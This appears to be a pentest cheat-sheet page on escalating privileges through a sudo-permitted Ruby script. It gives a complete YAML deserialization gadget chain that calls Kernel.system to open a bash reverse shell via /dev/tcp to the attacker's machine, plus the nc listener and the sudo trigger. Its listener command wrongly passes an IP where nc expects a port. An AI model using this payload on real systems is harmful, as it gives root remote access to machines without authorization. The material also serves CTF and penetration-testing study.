Ruby Privilege Escalation

Last modified: 2023-03-28

Privilege Escalation Reverse Shell

Ruby is an interpreted, high-level, general-purpose programming language.

Remote Code Execution with YAML

Check if the current user could run the ruby script as root privilege.

(root) NOPASSWD: /usr/bin/ruby sample.rb

If the sample.rb contains the “’sample.yml’)”, modify the YAML file as follow:

- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: "bash -c 'bash -i >& /dev/tcp/<local-ip>/<local-port> 0>&1'"
         method_id: :resolve

Then start listener in local machine.

nc -lvnp <local-ip>

Now run the sudo command.

sudo /usr/bin/ruby sample.rb